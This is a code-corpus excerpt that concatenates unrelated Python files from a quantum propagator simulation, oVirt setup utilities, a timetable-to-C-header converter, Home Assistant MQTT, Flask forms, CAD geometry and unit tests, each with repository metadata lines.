self.pau_i = np.array([[1,0],[0,1]])
def u_dt(self, H, tim):
"""propagator of dt time"""
if self.tb_model:
#cond = QnIni(k=self.k,ctrlt=self.ctrlt)
dx,dy,dz = self.QnIni.dvec(self.ctrlt[tim])
d = np.sqrt(dx**2 + dy**2 + dz**2)*self.dt
u = np.cos(d)*self.pau_i -1j*self.dt/d*np.sin(d)*H
else:
u = expm(-1j*H*self.dt)
return u
def u_t(self):
"""Evolve propergator for given time period"""
dim = self.dim
tim_all = self.tim_all
#ctrl = self.ctrl
H0 = self.H0
Hctrl = self.Hctrl
u_all = np.zeros((tim_all+1,dim,dim),dtype = complex)
u_all[0,:,:] = np.eye(dim)
for tim in xrange(tim_all):
H = H0 + Hctrl[tim]#np.matrix( ctrl[i,tim] * np.array(Hctrl[i]))
u_all[tim+1,:,:] = np.dot(self.u_dt(H,tim), u_all[tim,:,:])
return u_all
def phi_t(self):
"""Evolve state for given time period"""
dim = self.dim
tim_all = self.tim_all
phi_all = np.zeros((tim_all+1,dim,1),dtype = complex)
phi_all[0,:,:] = self.phi_i[:]
u_all = self.u_t()
for tim in xrange(tim_all):
phi_all[tim+1,:,:] = np.dot(u_all[tim+1,:,:], phi_all[0,:,:])
return phi_all
def prob_t(self,phi):
"""probability in time"""
return np.real(phi*np.conjugate(phi))
class QnIni:
def __init__(self, k, ctrlt, dt = .1, tau=1.,deltau=.5, ham_val=0,state='mix'):
self.dt = dt
self.k = k
self.ctrlt = np.array(ctrlt)
self.ham_val = ham_val
self.tau = tau
self.deltau = deltau
self.state = state
self.H0 = np.zeros((2,2))
self.save_name = 'save_name'
def dvec(self,ctrl):
k = self.k
tau = self.tau
deltau = self.deltau #+ ctrlt
val = self.ham_val
if val == 0:
dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl)
dy = (tau-deltau) * np.sin(k-ctrl)
dz = 0
elif val == 1:
deltau = -deltau
dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl)
dy = (tau-deltau) * np.sin(k-ctrl)
dz = 0
elif val == 2:
dx = 0.#self.tau/2.
dy = 0.#(self.tau-deltau) * np.sin(k-A)
dz = tau * np.cos(k-ctrl)
elif val == 3:
dx = self.tau/2.
dy = 0.#(self.tau-deltau) * np.sin(k-A)
#dz = (tau+ctrlt) * np.cos(k)
dz = tau * np.cos(k-ctrl)
elif val == 4:
dx = tau+deltau + (tau-deltau) * np.cos(k[0]-ctrl)
dy = (tau-deltau) * np.sin(k[1]-ctrl)
dz = 0
return dx,dy,dz
def ham(self,ctrl):
pau_x = np.array([[0,1],[1,0]])
pau_y = np.array([[0,-1j],[1j,0]])
pau_z = np.array([[1,0],[0,-1]])
pau_i = np.array([[1,0],[0,1]])
dx,dy,dz = self.dvec(ctrl)
return pau_x * dx + pau_y * dy + pau_z * dz
def ham_t(self):
ctrlt = self.ctrlt
return np.array(map(self.ham,ctrlt))
def phi_i(self):
state = self.state
w,v = np.linalg.eigh(self.ham(ctrl=0))
if state == 'mix':
return ((v[:,0]+v[:,1])/np.sqrt(2)).reshape(len(v[:,0]),1)
elif state == 'down':
return v[:,0].reshape(len(v[:,0]),1)
elif state == 'up':
return v[:,1].reshape(len(v[:,1]),1)
else:
print 'no such state!!'
def eig_energy(self,ctrl=0):
w, v = np.linalg.eigh(self.ham(ctrl))
return w
if __name__ == "__main__":
dt = .01
E0 = 1.
knum = 100
freq = 1.
tau = 1.
deltau = .5#-.3
#phi_ini = [[1],[0]]
n_tot = 4000
t_rel = (np.array(range(n_tot-1))-2000)*dt
ctrli = E0 * np.cos(freq*t_rel)
ki =[ 0.001 ,np.pi]
#ki = 0.001
ti = time()
cond1 = QnIni(k=ki, ctrlt=ctrli,ham_val = 4)
#phi_i = cond1.phi_i()
#Hctrl = cond1.ham_t()
#print Hctrl.shape
#H0 = np.zeros((2,2))
model1 = QnModel(cond1)
phit = model1.phi_t()
probt = model1.prob_t(phit)
print 'run_time: ', time() - ti
plt.plot(t_rel,probt[:-1,0,:])
plt.plot(t_rel,probt[:-1,1,:])
plt.show()
| 2.359375 | 2 |
packaging/setup/ovirt_engine_setup/util.py | redwebdew/ovirt-engine | 0 | 12759596 | #
# ovirt-engine-setup -- ovirt engine setup
#
# Copyright oVirt Authors
# SPDX-License-Identifier: Apache-2.0
#
#
"""Utils."""
import gettext
import grp
import pwd
import re
from otopi import constants as otopicons
from otopi import plugin
from otopi import util
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
def editConfigContent(
content,
params,
keep_existing=False,
changed_lines=None,
comment_re='[#]*\\s*',
param_re='\\w+',
new_comment_tpl='{spaces}# {original}',
separator_re='\\s*=\\s*',
new_line_tpl='{spaces}{param} = {value}',
added_params=None,
):
"""Return edited content of a config file.
Keyword arguments:
content - a list of strings, the content prior to calling us
params - a dict of params/values that should be in the output
If the value for a param is None, param is deleted
keep_existing - if True, existing params are not changed, only missing
ones are added.
changed_lines - an output parameter, a list of dictionaries with
added and removed lines.
comment_re - a regular expression that a comment marker prefixed
to param should match. If a commented param line is found,
a new line will be added after it.
param_re - a regular expression that should match params
new_comment_tpl - a template for a comment. {original} will be replaced
with this template, {spaces} will be replaced with
original whitespace prefix.
separator_re - a regular expression that the separator between
param and value should match
new_line_tpl - a template for a new line. {param} will be replaced
with param, {value} with value.
added_params - an output parameter, a list of params that were added
in the end because they were not found in content.
Params that appear uncommented in the input, are commented, and new
values are added after the commented lines. Params that appear only
commented in the input, the comments are copied as-is, and new lines
are added after the comments. Params that do not appear in the input
are added in the end.
"""
params = params.copy()
pattern = r"""
^
(?P<spaces>\s*)
(?P<comment>{comment_re})
(?P<original>
(?P<param>{param_re})
(?P<separator>{separator_re})
(?P<value>.*)
)
$
""".format(
comment_re=comment_re,
param_re=param_re,
separator_re=separator_re,
)
re_obj = re.compile(flags=re.VERBOSE, pattern=pattern)
# Find params which are uncommented in the input.
uncommented = set()
for line in content:
f = re_obj.match(line)
if (
f is not None and
f.group('param') in params and
not f.group('comment')
):
uncommented.add(f.group('param'))
if changed_lines is None:
changed_lines = []
if added_params is None:
added_params = []
newcontent = []
processed = set()
for line in content:
f = re_obj.match(line)
if (
f is not None and
f.group('param') in params and
not (
f.group('param') in uncommented and
f.group('comment')
)
# If param in uncommented and current line is comment,
# we do not need to process it - we process the uncommented
# line when we see it
):
if (
not f.group('comment') and
(
str(f.group('value')) == str(params[f.group('param')]) or
keep_existing
)
):
# value is not changed, or we do not care. do nothing
processed.add(f.group('param'))
else:
if (
f.group('param') in uncommented and
not f.group('comment')
):
# Add current line, commented, before new line
currentline = new_comment_tpl.format(
spaces=f.group('spaces'),
original=f.group('original'),
)
changed_lines.append(
{
'added': currentline,
'removed': line,
}
)
newcontent.append(currentline)
else:
# Only possible option here is that current line is
# a comment and param is not in uncommented. Keep it.
# Other two options are in "if"s above.
# The last option - param is not in uncommented
# and current line is not a comment - is not possible.
newcontent.append(line)
newline = new_line_tpl.format(
spaces=f.group('spaces'),
param=f.group('param'),
value=params[f.group('param')],
)
changed_lines.append(
{
'added': newline,
}
)
processed.add(f.group('param'))
line = newline
newcontent.append(line)
# Add remaining params at the end
for param, value in params.items():
if param not in processed:
newline = new_line_tpl.format(
spaces='',
param=param,
value=value,
)
newcontent.append(newline)
changed_lines.append(
{
'added': newline,
}
)
added_params.append(param)
return newcontent
@util.export
def getUid(user):
return pwd.getpwnam(user)[2]
@util.export
def getGid(group):
return grp.getgrnam(group)[2]
@util.export
def parsePort(port):
try:
port = int(port)
except ValueError:
raise ValueError(
_('Invalid port {number}').format(
number=port,
)
)
if port < 0 or port > 0xffff:
raise ValueError(
_('Invalid number {number}').format(
number=port,
)
)
return port
@util.export
def getPortTester():
def test_port(port):
res = ''
try:
parsePort(port)
except ValueError as e:
res = e
return res
return test_port
@util.export
def addExitCode(environment, code, priority=plugin.Stages.PRIORITY_DEFAULT):
environment[
otopicons.BaseEnv.EXIT_CODE
].append(
{
'code': code,
'priority': priority,
}
)
@util.export
def getPackageManager(logger=None):
"""Return a tuple with the package manager printable name string, the mini
implementation class and the sink base class, for the preferred package
manager available in the system.
The only parameter accepted by this function is a logger instance, that
can be ommited (or None) if the user don't wants logs.
"""
try:
from otopi import minidnf
minidnf.MiniDNF()
if logger is not None:
logger.debug('Using DNF as package manager')
return 'DNF', minidnf.MiniDNF, minidnf.MiniDNFSinkBase
except (ImportError, RuntimeError):
try:
from otopi import miniyum
# yum does not raises validation exceptions in constructor,
# then its not worth instantiating it to test.
if logger is not None:
logger.debug('Using Yum as package manager')
return 'Yum', miniyum.MiniYum, miniyum.MiniYumSinkBase
except ImportError:
raise RuntimeError(
_(
'No supported package manager found in your system'
)
)
# vim: expandtab tabstop=4 shiftwidth=4
| 2.484375 | 2 |
TimeTable2Header/timetable2header.py | SCOTT-HAMILTON/TimeTable2Header | 2 | 12759597 | <reponame>SCOTT-HAMILTON/TimeTable2Header
import pandas as pd
import numpy as np
import math
def convert_excel_timetable2_c_header(
input_excel_timetable):
name,weeks = extract_excel_data(input_excel_timetable)
return data_to_header(name, weeks)
def extract_excel_data(input_excel_timetable):
data = pd.read_excel(input_excel_timetable, engine="openpyxl")
name = data.columns[0]
data.fillna('', inplace=True)
numberOfWeeksFilled = int(len(list(filter(lambda x: x != '', data.values[0]))))
weeks = []
for week in range(numberOfWeeksFilled):
compressColumnCondition = np.full(numberOfWeeksFilled*2, False)
compressColumnCondition[week*2] = True
a1 = np.compress(compressColumnCondition, data.values, axis=1)
compressColumnCondition[week*2] = False
compressColumnCondition[week*2+1] = True
a2 = np.compress(compressColumnCondition, data.values, axis=1)
weekName = a1[0][0]
a1 = np.delete(a1,0,0)
a2 = np.delete(a2,0,0)
first = True
gaps = []
for hour in zip(a1,a2):
hour = np.array(hour)
hour = hour.flatten()
if first:
startTime = hour[0]
first = False
continue
elif hour[0] == '':
break
elif hour[1] == '':
endTime = hour[0]
else:
gaps.append((hour[0],hour[1]))
weeks.append((weekName, startTime, endTime, gaps))
return (name, weeks)
def data_to_header(name, weeks):
nameUppercase = name.upper()
text = """#ifndef APPS_AGENDA_"""+nameUppercase+"""_DEF_H
#define APPS_AGENDA_"""+nameUppercase+"""_DEF_H
#include "agenda_types.h"
const AgendaDef agenda_"""+name.lower()+""" =
{
.name = \""""+name+"""",
.days = {
"""+",\n".join([week_to_header(w) for w in weeks])+"""
}
};
#endif //APPS_AGENDA_"""+nameUppercase+"""_DEF_H"""
return text
def str_to_header_time(str):
tab = str.split('h')
return "{"+tab[0]+","+tab[1]+"}"
def week_to_header(week):
text = """ // """+week[0]+"""
{
"""+str_to_header_time(week[1])+""", // Start Time
"""+str(len(week[3]))+""", // gapsCount
{
"""+",\n".join([gap_to_header(g) for g in week[3]])+"""
},
"""+str_to_header_time(week[2])+""" // End Time
}"""
return text
def gap_to_header(gap):
text = """ {"""+str_to_header_time(gap[0])+""",
"""+str_to_header_time(gap[1])+"""}"""
return text
| 3.25 | 3 |
seata/core/model/BranchStatus.py | opentrx/seata-python | 8 | 12759598 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @author jsbxyyx
# @since 1.0
from enum import Enum
class BranchStatus(Enum):
"""
The Unknown.
description: Unknown branch status.
"""
Unknown = 0,
"""
The Registered.
description: Registered to TC.
"""
Registered = 1,
"""
The Phase one done.
description: Branch logic is successfully done at phase one.
"""
PhaseOne_Done = 2,
"""
The Phase one failed.
description: Branch logic is failed at phase one.
"""
PhaseOne_Failed = 3,
"""
The Phase one timeout.
description: Branch logic is NOT reported for a timeout.
"""
PhaseOne_Timeout = 4,
"""
The Phase two committed.
description: Commit logic is successfully done at phase two.
"""
PhaseTwo_Committed = 5,
"""
The Phase two commit failed retryable.
description: Commit logic is failed but retryable.
"""
PhaseTwo_CommitFailed_Retryable = 6,
"""
The Phase two commit failed unretryable.
description: Commit logic is failed and NOT retryable.
"""
PhaseTwo_CommitFailed_Unretryable = 7,
"""
The Phase two rollbacked.
description: Rollback logic is successfully done at phase two.
"""
PhaseTwo_Rollbacked = 8,
"""
The Phase two rollback failed retryable.
description: Rollback logic is failed but retryable.
"""
PhaseTwo_RollbackFailed_Retryable = 9,
"""
The Phase two rollback failed unretryable.
description: Rollback logic is failed but NOT retryable.
"""
PhaseTwo_RollbackFailed_Unretryable = 10 | 2.5 | 2 |
led/dump/led-demo-yun/cohorte/dist/cohorte-1.0.0-20141216.234517-57-python-distribution/repo/cohorte/composer/node/history.py | isandlaTech/cohorte-demos | 1 | 12759599 | <filename>led/dump/led-demo-yun/cohorte/dist/cohorte-1.0.0-20141216.234517-57-python-distribution/repo/cohorte/composer/node/history.py
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Node Composer: Node status history
:author: <NAME>
:license: Apache Software License 2.0
:version: 3.0.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (3, 0, 0)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# Composer
import cohorte.composer
# iPOPO Decorators
from pelix.ipopo.decorators import ComponentFactory, Provides, Instantiate, \
Invalidate
# Standard library
from pprint import pformat
import logging
import threading
import time
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
@ComponentFactory()
@Provides(cohorte.composer.SERVICE_HISTORY_NODE)
@Instantiate('cohorte-composer-node-history')
class NodeHistory(object):
"""
Associates components to their hosting isolate
"""
def __init__(self):
"""
Sets up members
"""
# Storage: time stamp -> distribution
self._storage = {}
self._lock = threading.Lock()
@Invalidate
def invalidate(self, context):
"""
Component invalidated
"""
self.clear()
def clear(self):
"""
Clears the storage
"""
with self._lock:
self._storage.clear()
def keep_recent(self, timestamp):
"""
Keeps history after the given time stamp, removes other entries
:param timestamp: Minimal timestamp to be kept
"""
with self._lock:
# Sort times
stamps = sorted(self._storage.keys())
for stamp in stamps:
if stamp < timestamp:
del self._storage[stamp]
def items(self):
"""
Returns a sorted list of (time stamp, {isolate -> [names]}) tuples
"""
with self._lock:
return sorted(self._storage.items())
def store(self, distribution):
"""
Stores the given isolate distribution
:param distribution: A isolate -> components names dictionary
"""
# Store the stamp ASAP
timestamp = time.time()
with self._lock:
# Store our distribution
self._storage[timestamp] = dict((isolate, tuple(components))
for isolate, components
in distribution.items())
_logger.info("Node composer stored in history:\n%s",
pformat(self._storage[timestamp]))
| 1.617188 | 2 |
homeassistant/components/ais_supla_mqtt/sensor.py | sckevmit/AIS-home-assistant | 5 | 12759600 | """Support for SUPLA MQTT sensors."""
from datetime import timedelta
import logging
import homeassistant.components.mqtt as hass_mqtt
from homeassistant.core import callback
from homeassistant.helpers.entity import Entity
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=2)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Perform the setup for SUPLA MQTT status sensor."""
_LOGGER.debug("SUPLA MQTT sensor, async_setup_entry")
config_mqtt_settings = hass.data[DOMAIN][config_entry.entry_id]
mqtt_settings = config_mqtt_settings.data
async_add_entities([SuplaMqttSoftBridge(hass, mqtt_settings)], True)
class SuplaMqttSoftBridge(Entity):
"""Supla Mqtt Soft Bridge representation."""
def __init__(self, hass, mqtt_settings):
"""Sensor initialization."""
self._username = mqtt_settings["username"]
self._qos = 0
self._manufacturer = "SUPLA.ORG"
self._model = "MQTT Bridge"
self._os_version = "v3"
self._supla_in = 0
self._supla_out = 0
self._sub_state = None
@callback
async def hass_message_out(self, msg):
"""Handle new MQTT messages."""
self._supla_out = self._supla_out + 1
@callback
async def supla_message_in(self, msg):
"""Handle new MQTT messages."""
self._supla_in = self._supla_in + 1
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await self._subscribe_topics()
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
self._sub_state = await hass_mqtt.subscription.async_subscribe_topics(
self.hass,
self._sub_state,
{
"execute": {
"topic": "supla/+/devices/+/channels/+/execute_action",
"msg_callback": self.hass_message_out,
"qos": self._qos,
},
"set": {
"topic": "supla/+/devices/+/channels/+/set/+",
"msg_callback": self.hass_message_out,
"qos": self._qos,
},
"set": {
"topic": "supla/#",
"msg_callback": self.supla_message_in,
"qos": self._qos,
},
"set": {
"topic": "homeassistant/#",
"msg_callback": self.supla_message_in,
"qos": self._qos,
},
},
)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await hass_mqtt.subscription.async_unsubscribe_topics(
self.hass, self._sub_state
)
@property
def device_info(self):
"""Device info."""
return {
"identifiers": {(DOMAIN, self._username)},
"name": f"MQTT Bridge",
"manufacturer": self._manufacturer,
"model": self._model,
"sw_version": self._os_version,
"via_device": None,
}
@property
def unique_id(self) -> str:
"""Return a unique, friendly identifier for this entity."""
return self._username
@property
def name(self):
"""Return the name of the sensor."""
return f"SUPLA connection status"
@property
def state(self):
"""Return the status of the sensor."""
# connection result codes
return "mqtt bridge connection"
@property
def unit_of_measurement(self) -> str:
"""Return the unit of measurement of this entity."""
return ""
@property
def device_state_attributes(self):
"""Return the attributes of the device."""
return {
"MQTT packets OUT": self._supla_out,
"MQTT packets IN": self._supla_in,
}
@property
def icon(self):
"""Return the icon to use in the frontend."""
return "mdi:bridge"
async def async_update(self):
"""Sensor update."""
pass
| 2.28125 | 2 |
utils.py | gim4855744/GCCF | 0 | 12759601 | import scipy.sparse as sp
import pandas as pd
import numpy as np
import torch
import h5py
def get_adj(num_rows, num_cols, row_idx, col_idx, device):
adj = torch.zeros((num_rows, num_cols), dtype=torch.float32, device=device)
adj[row_idx, col_idx] = 1.
adj = adj / adj.sum(dim=1, keepdim=True)
adj.masked_fill_(torch.isnan(adj), 0)
return adj
def load_matlab_file(path_file, name_field):
db = h5py.File(path_file, 'r')
ds = db[name_field]
try:
if 'ir' in ds.keys():
data = np.asarray(ds['data'])
ir = np.asarray(ds['ir'])
jc = np.asarray(ds['jc'])
out = sp.csc_matrix((data, ir, jc))
except AttributeError:
out = np.asarray(ds).T
db.close()
return out.astype(np.int)
def matrix2data(matrix, rating):
idx = np.argwhere(matrix > 0)
rows = idx[:, 0]
columns = idx[:, 1]
ratings = rating[rows, columns].reshape(-1, 1)
data = np.concatenate([idx, ratings], axis=1)
data = pd.DataFrame(data, columns=('user', 'movie', 'rating'))
return data
| 2.09375 | 2 |
app/main/forms.py | lihuii/fanxiangce | 79 | 12759602 | <gh_stars>10-100
# -*-coding: utf-8-*-
from flask_wtf import Form
from wtforms import StringField, SubmitField, RadioField, PasswordField, BooleanField, FileField, \
TextAreaField, SelectField, IntegerField, SelectMultipleField
from wtforms.validators import DataRequired, Length, Email, Regexp, EqualTo, URL, Optional, NumberRange
from wtforms import ValidationError
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms.widgets import TextArea
from .. import photos
from ..models import User, Role
class SettingForm(Form):
name = StringField(u'姓名或昵称', validators=[Length(0, 64)])
status = StringField(u'签名档', validators=[Length(0, 64)])
location = StringField(u'城市', validators=[Length(0, 64)])
website = StringField(u'网站', validators=[Length(0, 64), Optional(),
], render_kw={"placeholder": "http://..."})
about_me = TextAreaField(u'关于我', render_kw={'rows': 8})
like_public = BooleanField(u'公开我的喜欢')
submit = SubmitField(u'提交')
def validate_website(self, field):
if field.data[:4] != "http":
field.data = "http://" + field.data
class EditProfileAdminForm(Form):
email = StringField(u'邮箱', validators=[DataRequired(message= u'邮件不能为空'), Length(1, 64),
Email(message= u'请输入有效的邮箱地址,比如:<EMAIL>')])
username = StringField(u'用户名', validators=[DataRequired(message= u'用户名不能为空'), Length(1, 64),
Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
u'用户名只能有字母,'
u'数字,点和下划线组成。')])
confirmed = BooleanField(u'确认状态')
role = SelectField(u'角色', coerce=int)
name = StringField(u'姓名或昵称', validators=[Length(0, 64)])
location = StringField(u'城市', validators=[Length(0, 64)])
website = StringField(u'网站', validators=[Length(0, 64),
URL(message= u'请输入有效的地址,比如:http://withlihui.com')])
about_me = TextAreaField(u'关于我')
submit = SubmitField(u'提交')
def __init__(self, user, *args, **kwargs):
super(EditProfileAdminForm, self).__init__(*args, **kwargs)
self.role.choices = [(role.id, role.name)
for role in Role.query.order_by(Role.name).all()]
self.user = user
def validate_email(self, field):
if field.data != self.user.email and \
User.query.filter_by(email=field.data).first():
raise ValidationError(u'邮箱已经注册,请直接登录。')
def validate_username(self, field):
if field.data != self.user.username and \
User.query.filter_by(username=field.data).first():
raise ValidationError(u'用户名已被注册,换一个吧。')
class CommentForm(Form):
body = TextAreaField(u'留言', validators=[DataRequired(u'内容不能为空!')], render_kw={'rows': 5})
submit = SubmitField(u'提交')
class NewAlbumForm(Form):
title = StringField(u'标题')
about = TextAreaField(u'介绍', render_kw={'rows': 8})
photo = FileField(u'图片', validators=[
FileRequired(u'你还没有选择图片!'),
FileAllowed(photos, u'只能上传图片!')
])
asc_order = SelectField(u'显示顺序',
choices=[('True', u'按上传时间倒序排列'), ('False', u'按上传时间倒序排列')])
no_public = BooleanField(u'私密相册(勾选后相册仅自己可见)')
no_comment = BooleanField(u'禁止评论')
submit = SubmitField(u'提交')
class AddPhotoForm(Form):
photo = FileField(u'图片', validators=[
FileRequired(),
FileAllowed(photos, u'只能上传图片!')
])
submit = SubmitField(u'提交')
class EditAlbumForm(Form):
title = StringField(u'标题')
about = TextAreaField(u'介绍', render_kw={'rows': 8})
asc_order = SelectField(u'显示顺序',
choices=[("1", u'按上传时间倒序排列'), ("0", u'按上传时间倒序排列')])
no_public = BooleanField(u'私密相册(右侧滑出信息提示:勾选后相册仅自己可见)')
no_comment = BooleanField(u'允许评论')
submit = SubmitField(u'提交')
| 2.375 | 2 |
mach_cad/model_obj/cross_sects/parallelogram/__init__.py | Severson-Group/MachEval | 6 | 12759603 | import numpy as np
from ...dimensions.dim_linear import DimLinear
from ...dimensions.dim_angular import DimAngular
from ...dimensions import DimRadian
from ..cross_sect_base import CrossSectBase, CrossSectToken
__all__ = ['CrossSectParallelogram']
class CrossSectParallelogram(CrossSectBase):
def __init__(self, **kwargs: any) -> None:
'''
Intialization function for Parallelogram class. This function takes in
arguments and saves the information passed to private variable to make
them read-only
Parameters
----------
**kwargs : any
DESCRIPTION. Keyword arguments provided to the initialization function.
The following argument names have to be included in order for the code
to execute: name, dim_l, dim_t, dim_theta, location.
Returns
-------
None
'''
self._create_attr(kwargs)
super()._validate_attr()
self._validate_attr()
@property
def dim_l(self):
return self._dim_l
@property
def dim_t(self):
return self._dim_t
@property
def dim_theta(self):
return self._dim_theta
def draw(self, drawer):
l = self.dim_l # height of the parallelogram
t = self.dim_t # width of the parallelogram
theta = DimRadian(self.dim_theta) # angle of the parallelogram
x = [0, l * np.cos(theta), l * np.cos(theta) + t / np.sin(theta), t / np.sin(theta)]
y = [0, l * np.sin(theta), l * np.sin(theta), 0];
z = np.array([x, y])
coords = np.transpose(z)
points = self.location.transform_coords(coords)
# draw parallelogram
side_1 = drawer.draw_line(points[0], points[1])
side_2 = drawer.draw_line(points[1], points[2])
side_3 = drawer.draw_line(points[2], points[3])
side_4 = drawer.draw_line(points[3], points[0])
x_coord = (l * np.cos(theta) + t / np.sin(theta)) / 2
y_coord = l * np.sin(theta) / 2
ic = np.array([[x_coord, y_coord]])
inner_coord = self.location.transform_coords(ic)
segments = [side_1, side_2, side_3, side_4]
cs_token = CrossSectToken(inner_coord[0], segments)
return cs_token
def _validate_attr(self):
if not isinstance(self._dim_l, DimLinear):
raise TypeError('dim_l is not of DimLinear')
if not isinstance(self._dim_t, DimLinear):
raise TypeError('dim_t is not of DimLinear')
if not isinstance(self._dim_theta, DimAngular):
raise TypeError('dim_theta is not of DimAngular')
| 2.703125 | 3 |
helpers/presentation.py | krassowski/meningitis-integration | 0 | 12759604 | <filename>helpers/presentation.py
from IPython.core.display import HTML
def show_list(data, mode='bullet'):
assert mode in {'bullet', 'numeric'}
output = ''
if mode == 'bullet':
container = 'ul'
else:
container = 'ol'
output += f'<{container}>'
for element in data:
output += '<li>' + str(element)
output += f'</{container}>'
return HTML(output)
def compare_sets(a, b, percentage=None):
a = set(a)
b = set(b)
additional_in_a = a - b
additional_in_b = b - a
out = []
for i, difference in enumerate([additional_in_a, additional_in_b]):
if difference:
if len(difference) < 10:
difference_text = difference
else:
dl = sorted(difference)
total_diff = len(difference)
if percentage:
total = len(a.union(b))
total_diff = f'{total_diff} ({total_diff / total * 100:.2f}%)'
difference_text = (
'{'
+ ', '.join(dl[:3])
+ ', ..., '
+ ', '.join(dl[-3:])
+ '}' + f', {total_diff} in total'
)
out += [f'The {"first" if i == 0 else "second"} set has additional elements: {difference_text}']
if a == b:
assert not additional_in_a and not additional_in_b
out = ['The sets are equal']
return HTML('<br>'.join(out))
| 2.9375 | 3 |
wxgigo/management/base.py | rfancn/wxgigo | 0 | 12759605 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import unicode_literals
import sys
import os
import wxgigo
from wxgigo.management.cmdparser import CommandParser, CommandError, SystemCheckError
#from wxgigo.utils.version import get_version
class BaseCommand(object):
"""
Base Command
"""
_called_from_command_line = False
# Metadata about this command.
option_list = ()
help = ''
args = ''
def __init__(self):
pass
def get_version(self):
"""
Return the wxgigo version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return wxgigo.get_version()
@property
def use_argparse(self):
return not bool(self.option_list)
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
return 'asdfojasodfi'
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``ArgumentParser`` which will be used to
parse the arguments to this command.
"""
parser = CommandParser(self, prog="%s %s" % (os.path.basename(prog_name), subcommand),
description=self.help or None)
parser.add_argument('--version', action='version', version=self.get_version())
if self.args:
# Keep compatibility and always accept positional arguments, like optparse when args is set
parser.add_argument('args', nargs='*')
self.add_arguments(parser)
return parser
def add_arguments(self, parser):
"""
Entry point for subclassed commands to add custom arguments.
"""
pass
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command. If the
command raises a ``CommandError``, intercept it and print it sensibly
to stderr. If the ``--traceback`` option is present or the raised
``Exception`` is not ``CommandError``, raise it.
"""
self._called_from_command_line = True
parser = self.create_parser(argv[0], argv[1])
options = parser.parse_args(argv[2:])
cmd_options = vars(options)
# Move positional args out of options to mimic legacy optparse
args = cmd_options.pop('args', ())
try:
self.handle(*args, **cmd_options)
except Exception as e:
if not isinstance(e, CommandError):
raise
self.stderr.write('%s: %s' % (e.__class__.__name__, e))
sys.exit(1)
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement this method.
"""
raise NotImplementedError('subclasses of BaseCommand must provide a handle() method')
| 1.945313 | 2 |
tests/kyu_8_tests/test_my_head_is_at_the_wrong_end.py | the-zebulan/CodeWars | 40 | 12759606 | <gh_stars>10-100
import unittest
from katas.kyu_8.my_head_is_at_the_wrong_end import fix_the_meerkat
class FixTheMeerkatTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(
fix_the_meerkat(['tail', 'body', 'head']),
['head', 'body', 'tail']
)
def test_equals_2(self):
self.assertEqual(
fix_the_meerkat(['tails', 'body', 'heads']),
['heads', 'body', 'tails']
)
def test_equals_3(self):
self.assertEqual(
fix_the_meerkat(['bottom', 'middle', 'top']),
['top', 'middle', 'bottom']
)
def test_equals_4(self):
self.assertEqual(
fix_the_meerkat(['lower legs', 'torso', 'upper legs']),
['upper legs', 'torso', 'lower legs']
)
def test_equals_5(self):
self.assertEqual(
fix_the_meerkat(['ground', 'rainbow', 'sky']),
['sky', 'rainbow', 'ground']
)
| 3.078125 | 3 |
MuseParse/tests/testLilyMethods/testMeasure.py | Godley/MusIc-Parser | 5 | 12759607 | import unittest
from MuseParse.classes.ObjectHierarchy.ItemClasses import Directions, BarlinesAndMarkers, Meter, Note
from MuseParse.tests.testLilyMethods.lily import Lily
from MuseParse.classes.ObjectHierarchy.TreeClasses.NoteNode import NoteNode
from MuseParse.classes.ObjectHierarchy.TreeClasses.MeasureNode import MeasureNode
from MuseParse.classes.ObjectHierarchy.TreeClasses.StaffNode import StaffNode
class MeasureTests(Lily):
def testValue(self):
if hasattr(self, "lilystring"):
